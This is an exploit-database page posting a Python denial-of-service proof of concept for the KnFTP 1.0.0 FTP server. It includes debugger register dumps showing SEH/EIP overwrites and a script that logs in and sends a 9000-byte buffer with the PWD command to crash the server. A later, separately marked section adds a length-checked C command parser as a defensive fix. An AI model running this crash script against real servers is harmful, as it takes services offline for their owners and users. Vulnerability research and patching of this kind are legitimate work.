0day.today - Biggest Exploit Database in the World.
KnFTP 1.0.0 Server Multiple Buffer Overflow Exploit (DoS PoC)
#!/usr/bin/python
# Title: KnFTP Server Buffer Overflow Exploit (DoS PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret (kinda)
# Bug that made me fuzz this app by Blake: http://www.exploit-db.com/exploits/17819/
# Date Found: Sept 18th 2011
# Tested on: Windows XP SP2/SP3 Professional (DEP off)
# Nod to the Exploit-DB Team

# Vulnerable commands: MKD / LS / ABOR / CD / APPE / REST / PWD
# So it just looks like all this app's commands are vulnerable. Even commands
# that the server doesn't support. SEH and/or EIP gets overwritten.
# It's almost like this application was made to be vulnerable.
# Anyway have fun.

#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "MKD"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFE
#EIP 77C460C1 msvcrt.77C460C1
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 1 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDE000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
# 3 2 1 0 E S P U O Z D I
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "LS"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFF
#EIP 77C460C1 msvcrt.77C460C1
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 1 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDE000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
# 3 2 1 0 E S P U O Z D I
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

#SEH chain of thread 000001BC, item 0
#Address=00C7FFDC
#SE handler=41414141

#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "ABOR"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFD
#EIP 77C460C1 msvcrt.77C460C1
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 1 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDD000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
# 3 2 1 0 E S P U O Z D I
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

import socket

buffer = "\x41" * 9000

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
s.send('PWD ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()

# 0day.today [2024-10-06] #
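
The crashes recorded above follow from a 9000-byte argument reaching the command handlers unchecked. As an added example (not part of the original PoC and not KnFTP's code), here is a length-checked FTP control-line parser in C that rejects such input before any copy takes place. The names ftp_parse_line and struct ftp_cmd and the FTP_MAX_* limits are assumptions chosen for illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Assumed limits for illustration; size them to the server's real buffers. */
#define FTP_MAX_LINE 512  /* whole control-channel line, CRLF included */
#define FTP_MAX_VERB 4    /* FTP verbs are three or four letters */
#define FTP_MAX_ARG  255

enum ftp_parse { FTP_OK = 0, FTP_TOO_LONG, FTP_BAD_SYNTAX };

struct ftp_cmd {
    char verb[FTP_MAX_VERB + 1];
    char arg[FTP_MAX_ARG + 1];
};

/* Parse one received line of len bytes (hypothetical helper). Every length is
 * checked before any copy, and supported and unsupported verbs share this path. */
enum ftp_parse ftp_parse_line(const char *line, size_t len, struct ftp_cmd *out)
{
    size_t vlen = 0, alen, i;

    memset(out, 0, sizeof *out);
    if (len > FTP_MAX_LINE)
        return FTP_TOO_LONG;            /* reject before touching the data */
    if (len < 2 || line[len - 2] != '\r' || line[len - 1] != '\n')
        return FTP_BAD_SYNTAX;          /* must end in CRLF */
    len -= 2;

    while (vlen < len && line[vlen] != ' ') {
        if (vlen == FTP_MAX_VERB || !isalpha((unsigned char)line[vlen]))
            return FTP_BAD_SYNTAX;
        vlen++;
    }
    if (vlen == 0)
        return FTP_BAD_SYNTAX;
    alen = (vlen == len) ? 0 : len - vlen - 1;  /* bytes after the space */
    if (alen > FTP_MAX_ARG)
        return FTP_TOO_LONG;
    if (alen && memchr(line + vlen + 1, '\0', alen))
        return FTP_BAD_SYNTAX;          /* NUL would truncate later string ops */

    for (i = 0; i < vlen; i++)
        out->verb[i] = (char)toupper((unsigned char)line[i]);
    if (alen)
        memcpy(out->arg, line + vlen + 1, alen);
    return FTP_OK;                      /* both fields are NUL-terminated */
}
```

A server built this way would answer FTP_TOO_LONG and FTP_BAD_SYNTAX with a 500-class reply and only then dispatch on the verb, so an oversized argument never reaches a command handler.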